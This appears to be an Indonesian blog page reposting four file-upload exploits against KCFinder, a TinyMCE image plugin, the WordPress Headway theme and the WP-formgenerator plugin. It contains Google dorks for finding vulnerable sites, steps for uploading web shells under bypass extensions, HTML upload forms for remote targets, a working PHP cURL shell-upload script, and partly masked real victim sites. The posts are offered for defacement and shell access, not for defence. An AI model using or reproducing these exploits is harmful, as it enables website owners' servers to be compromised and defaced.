Sabtu, 31 Oktober 2015

KCFinder Upload Shell Vulnerability



#-  Exploit Title : KCFinder Upload Shell Vulnerability
#- Exploit Author : Iranian_Dark_Coders_Team
#- Google Dork : inurl:/kcfinder/browse.php
#- Date : 24/04/2014
#- Home : www.idc-team. net
#- Discovered By : Black.Hack3r
#- Vendor Homepage : kcfinder.sunhater. com
#- Version : 2.51 - 2.53
#- Tested on : Windows 8 & Linux

=================================================

 [+] Events location bug:

 [+] http://127.0.0.1/path/kcfinder/config.php

  Line 51: 'deniedExts' => "exe com msi bat php phps phtml php3 php4 cgi pl",



 [+] Exploit:
 
 [+] http://127.0.0.1/kcfinder/browse.php
 [+] http://127.0.0.1/[path]/kcfinder/browse.php



 [+] Proof Of Cencept

Trick 1 ~~
 
1 > Go to target link
    http://localhost/KCFinder/browse.php

2 > Then select your folder from the left panel

3 > Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defacepage.html ]

4 > Shell Acces ?
      {here}
       

Trick 2 ~~

Where is vulnerability ? "localhost/path/kcfinder/upload.php"

How to ??  You can use CSRF :) 

<form method="POST" action="http://web. com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form> 

Shell Acces ? {here}

 [+] Demo site:

 [+] http://www.basukiwat**.com/assets/js/mylibs/kcfinder/browse.php
 [+] http://www.padel4**.be/kcfinder/browse.php
 [+] http://goyathlaysvintagepavonirestoratio**.com/kcfinder/browse.php



 [+] Discovered By : Black.Hack3r
 [+] We Are : M.R.S.CO,Black.Hack3r,N3O,D$@d_M@n,KurD_HaCK3R,HOt0N
 [+] SpTnx  : Sec4ever,HashoR,@3is,Security,M4H4N,Mr.Cicili And All IDC Member
 [+] Home : www.idc-team. net




Diposting oleh di Tidak ada komentar:
Label: , , ,

Exploit JustBoil TinyMCE Images Upload Unrestricted #issue


#-Title: Exploit JustBoil TinyMCE Images Upload Unrestricted #issue
#-Author: Goginho
#-Date: 10/31/2015
#- Vendor : justboil
#- Link Download : github. com/vikdiesel/justboil. me
#- Tested on : Trusty Tahr / ubuntu
#- Fixed in ??
==========================================================================

Proof Of Concept :

[#] Google Dork: 
intext:"{#jbimages_dlg.select_an_image}"
inurl:"/plugins/jbimages/"

[#] Vulnerability / Exploit : "/public/js/tiny_mce/plugins/jbimages/dialog.htm"

[#] When Vulnerable :



This is just issue, problably u can exploited this plugin.

Shell Acces ? hmm .. 
Diposting oleh di Tidak ada komentar:
Label: ,

Selasa, 27 Oktober 2015

Wordpress Headway Themes Shell Upload Vulnerability



#-Title: Wordpress Headway Themes Shell Upload Vulnerability
#-Author: Anonymously
#-Date: 10/27/2015
#- Vendor : headwaythemes. com
#- Developer : Clay Griffith
#- Link Download : headwaythemes. com/pricing/
#-Google Dork: inurl:wp-content/themes/headway-(random)
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

·        Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php 
·         When Vulnerable /home/localhost/public_html/


Proof Of Concept :


Tools Coded by Mr.MaGnoM

<?php


/*
link of tool with vedio : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
coded by mr magnom
more tools visit my blog  ==> magsec.blogspot.com  :)

so why i didnt make auto exploiter because theme headway dont have one name
for example u will filn /headway-2014/ and  /headway-2015/ or /headway-163/  , /headway-120/
so is soo defficult to make auto exploiter so u must cheek firstly complet name of theme than

write it on site.com/wp-content/themes/headway(complet name)/library/visual-editor/lib/upload-header.php

shell go to  : site/wp-content/uploads/headway/header-uploads/shell is stabl for all site

that script on php for exploit site by site :/

to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
*/


$url="3xploi7.id"; // link here
$file="lolz.php ";   // ur shell here
$post = array('Filedata'=>"@$file") ;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$url");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
//print $data;
if($data=="1"){
  echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
}else{
  echo "\nnot infected\n";
}

?>

Shell Acces ?  Here


Diposting oleh di Tidak ada komentar:
Label: , , ,

Senin, 26 Oktober 2015

Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities




#-Title: Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities
#-Author: unknown
#-Date: 10/26/2015
#- Vendor : CodeCanyon
#- Link Download : codecanyon. net/item/form-generator-wordpress-form-builder/4613911
#-Google Dork: inurl:wp-content/plugins/wp-formgenerator
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

Vulnerability : "/wp-content/plugins/wp-formgenerator/uploads/php"
 When Vulnerable {"files":[]}

Proof Of Concept :

Use CSRF :

<form method="POST" action="Zembut/wp-content/plugins/wp-formgenerator/uploads/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

</form>


Shell Acces ? Here





Diposting oleh di Tidak ada komentar:
Label: , ,
Langganan: Postingan (Atom)